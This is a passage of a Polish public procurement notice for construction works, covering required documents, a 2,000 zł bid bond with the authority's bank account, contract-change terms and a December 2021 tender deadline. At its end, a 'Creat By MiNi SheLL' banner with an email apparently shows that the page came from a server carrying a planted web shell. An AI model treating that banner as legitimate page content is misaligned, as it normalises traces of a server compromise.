(oceniona, jako najkorzystniejsza), zostanie wezwany przez<br/>Zamawiającego w wyznaczonym terminie nie krótszym niż 5 dni terminie do przedłożenia<br/>następujących oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów):<br/>2.1. W zakresie nie podlegania wykluczeniu z udziału w postępowaniu:<br/>1) Aktualizującego oświadczenia o braku podstaw wykluczenia z postępowania na podstawie art. 108<br/>ust. 1 pkt 5 ustawy pzp – wg Załącznika nr 8 SWZ.<br/>2) Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie<br/>zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie<br/>wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub<br/>opłat – także dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca<br/>dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;<br/>3) Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu<br/>Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej<br/>Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem – także dokumentów potwierdzających, że przed upływem terminu składania ofert<br/>Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>W przypadku złożenia oferty wspólnej dokumenty z podpunktów 1-4 składa każdy z wykonawców,<br/>którzy złożyli ofertę wspólną.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W trakcie procedury badania i oceny ofert na podstawie art. 274 ust 1<br/>ustawy pzp Wykonawca, którego oferta zostanie najwyżej oceniona (oceniona, jako najkorzystniejsza),<br/>zostanie wezwany przez Zamawiającego w wyznaczonym terminie nie krótszym niż 5 dni terminie do<br/>przedłożenia następujących oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub<br/>dokumentów):<br/>2.2. W zakresie spełnienia warunków udziału w postępowaniu:<br/>1) Wykazu wykonanych robót budowlanych oraz dokumentu potwierdzającego należytą realizację – na<br/>potwierdzenie spełnienia warunku udziału wskazanego w SWZ:<br/>Załącznik nr 6 SWZ (wykaz wykonanych robót budowlanych - doświadczenie).<br/>2) Wykazu osób które będą uczestniczyć w realizacji zamówienia – na potwierdzenie spełnienia<br/>warunku udziału wskazanego w SWZ:<br/>Załącznik nr 7 SWZ (wykaz osób, kwalifikacje).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykaz oświadczeń w celu wstępnego potwierdzenia, że wykonawca nie podlega wykluczeniu<br/>oraz spełnia<br/>warunki udziału w postępowaniu (rozdział V ust. 1 niniejszej SWZ) – SKŁADANE DO OFERTY:<br/>1) aktualne na dzień składania ofert oświadczenie stanowiące wstępne potwierdzenie, że<br/>Wykonawca niepodlega wykluczeniu oraz spełnia warunki udziału w postępowaniu zgodne z<br/>załączonymi wzorami.<br/>Załącznik nr 3 SWZ<br/>Załącznik nr 4 SWZ<br/>2) zobowiązanie podmiotu trzeciego, o którym mowa w art. 118 ust 3 i ust. 4 ustawy pzp – jeżeli<br/>Wykonawca polega na zasobach lub sytuacji podmiotu trzeciego.<br/>Załącznik nr 5 SWZ<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w<br/>zakresie braku podstaw wykluczenia (Załącznik nr 3) składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. W zakresie spełnienia warunków udziału w postępowaniu<br/>oświadczenie składa ten wykonawca, który spełnia warunek lub łącznie razem.<br/>4) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>5) Pełnomocnictwo lub inny dokument, z którego wynika umocowanie do składania oświadczeń<br/>w imieniu wykonawcy, podmiotu udostępniającego zasoby czy złożeniu oferty wspólnej.<br/>W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej,<br/>jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o<br/>ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów (formularz oferty<br/>Załącznik nr 1 SWZ). Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa powyżej, zamawiający może żądać<br/>od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania wykonawcy. Powyższe stosuje się odpowiednio do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz odpowiednio<br/>do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w<br/>art. 118 ustawy lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich<br/>zasadach.<br/>6) Wycenioną tabelę elementów rozliczeniowych, o treści zgodnej z załączonym wzorem – wg<br/>Załącznika nr 2 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Żądanie wadium, jego wysokość oraz formy wniesienia – art. 97 ustawy Pzp<br/>1. Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 2 000,00 zł<br/>(słownie: dwa tysiące złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy Pzp.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu przelewem na konto Zamawiającego :<br/>Nr 97 8457 0008 2012 0300 0231 0002 BS Gliwice O/Ciasna<br/>Wniesienie wadium w pieniądzu będzie skuteczne, gdy wpływ środków na rachunek<br/>zamawiającego nastąpi przed upływem terminu składania ofert<br/>2)gwarancjach bankowych;<br/>3)gwarancjach ubezpieczeniowych;<br/>4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r.<br/>poz. 310, 836 i 1572).<br/>4. Wadium wnoszone w formach określonych w pkt 2, 3, 4 musi być bezwarunkowe i tożsame z<br/>wadium wnoszonym w pieniądzu a oryginał gwarancji lub poręczenia przekazuje się<br/>zamawiającemu w postaci elektronicznej.<br/>5. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>6. Zamawiający zatrzyma wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp..<br/>7. Wadium, w przypadku Wykonawców wspólnie ubiegający się o zamówienie, może być<br/>wniesione wspólnie przez te podmioty lub przez jednego z Wykonawców, z tym że z treści<br/>dokumentu musi wynikać, że wadium Dotyczy oferty składanej przez wszystkie podmioty<br/>występujące wspólnie. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień Umowy1. Zamawiający działając zgodnie z przepisami art. 455 ustawy<br/>Pzp, przewiduje w ogłoszeniu o zamówieniu lub dokumentach zamówienia możliwość zmiany<br/>umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia .2. Zmiany w<br/>umowie mogą dotyczyć:1) zmiany terminu wykonania zamówienia,2) zmiany w zakresie zmian<br/>technologicznych,3) zmiany na polecenie Zamawiającego,4) zmiany w zakresie personelu<br/>Wykonawcy, na zasadach szczegółowo opisanych w § 10 Umowy,5) zmiana w zakresie<br/>podwykonawstwa, szczegółowo opisana w § 12 Umowy,Uszczegółowienie zapisów dotyczących<br/>zakresu zmian w umowie są zawarte w paragrafie 17 załącznika nr 11 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-27 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-27 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com